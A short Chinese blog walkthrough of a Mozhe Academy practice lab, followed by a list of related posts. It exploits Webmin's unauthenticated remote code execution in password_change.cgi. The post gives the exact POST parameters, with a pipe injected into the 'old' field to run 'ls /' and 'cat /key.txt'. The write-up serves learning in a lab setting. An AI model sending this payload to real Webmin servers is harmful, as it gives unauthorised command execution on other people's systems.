[墨者学院]——Webmin未经身份验证的远程代码执行

做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/100011292]

漏洞描述:Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

既然是发送POST请求达到任意执行,而且无需身份验证想到的肯定是bp抓包。

根据漏洞的原理我们修改下面几个地方

修改post请求路径改为 /password_change.cgi
user=hhh&pass=&expired=2&old=test1 | ls /&new1=test2&new2=test2

发现key.txt,构造user=hhh&pass=&expired=2&old=test1 |cat /key.txt&new1=test2&new2=test2即可获得key。

Webmin未经身份验证的远程代码执行相关推荐

  1. 墨者学院—Webmin未经身份验证的远程代码执行(简单复习)

    墨者学院-Webmin未经身份验证的远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理 ...

  2. Webmin未经身份验证的远程代码执行-墨者学院

    01 背景介绍 Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作.据统计,互联网上大约有13w台机器使用Webmin. ...

  3. Horizon DAAS环境Log4J远程代码执行漏洞危害减轻措施

    一.问题描述 2021 年 12 月 9 日,VMware 威胁分析部门 (TAU) 也注意到Java Log4j 模块中存在的一个大规模.高影响的漏洞.此漏洞称为 Log4Shell,安全跟踪编码为 ...

  4. 注意!多款智能家居Hub存在远程代码执行漏洞

    近日,有研究团队在三个不同的家庭集线器– Fibaro Home Center Lite,Homematic中央控制单元(CCU2)和eLAN-RF-003中发现了许多严重的安全漏洞.这些设备用于监视 ...

  5. CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞

    VoIPMonitor未授权远程代码执行漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042 测试代码执行 0X005 PO ...

  6. WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

    1.产品简介 Oracle WebLogic Server是一个统一的可扩展平台,用于在本地和云端开发.部署和运行企业应用程序,例如 Java.WebLogic Server提供了Java Enter ...

  7. Linux Kernel 远程代码执行漏洞(CVE-2022-47939)

    Linux Kernel 远程代码执行漏洞(CVE-2022-47939) CVE-2022-47939 据Security Affairs消息,近期披露的一个严重 Linux 内核漏洞会影响 SMB ...

  8. 思科NGA设备中发现的高严重性漏洞,漏洞可导致未经身份验证即可远程攻击设备

    "Cisco NetFlow Generation Appliance(NGA)的流控制传输协议(SCTP)解码器中的漏洞可能允许未经身份验证的远程攻击者导致设备挂起或意外重新加载,从而导致 ...

  9. linux内核远程漏洞,CVE-2019-11815:Linux内核竞争条件漏洞导致远程代码执行

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一 ...

最新文章

  1. MySQL修改数据库:ALTER DATABASE用法简介
  2. 细说php这么难懂,挺难懂的解决方法
  3. win 7 或 mac 远程桌面到 ubuntu (ssh)
  4. 关于下载(前后端)第1部分
  5. 匿名类型(C# 编程指南)
  6. 实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)
  7. Java建造者模式(Builder模式)
  8. Ajax 重新绑定 webgrid 数据,绑定WebGrid表单AJAX
  9. rv1126 固件编译规则
  10. 线性判别分析LDA算法与python实现
  11. 58技术主席孙玄:硬核揭秘万亿级微服务分布式事务实战!
  12. 2020求职必读!疫情后有哪些风口行业和公司?
  13. 数据库的锁有哪几种?语句怎么实现
  14. CSS hover改变背景图片过渡动画生硬
  15. c语言中取小数函数,C / C++ 保留小数函数(setprecision(n)的一些用法总结)
  16. 中文字体设置fontFamily无效
  17. 一次 WebResource.axd 异常处理经历
  18. 祭奠我死去的CET-6
  19. Excel工作表探密
  20. 1875.贝茜的报复

热门文章

  1. LocalDate、LocalDateTime计算时间差
  2. Android Gradle 7.x新版本的依赖结构变化
  3. 转:成功者的第四个特征,如何与他人打交道?
  4. c++类与对象(一)
  5. 【互动赠书】第 4 期开奖,第 5 期书单(21本)
  6. 新闻发布管理系统/新闻网站
  7. 模型加速之轻量化网络
  8. linux权限可被登录用户读取,Linux 用户及权限详解
  9. Httpd服务重定向配置
  10. C++小白如何做简单游戏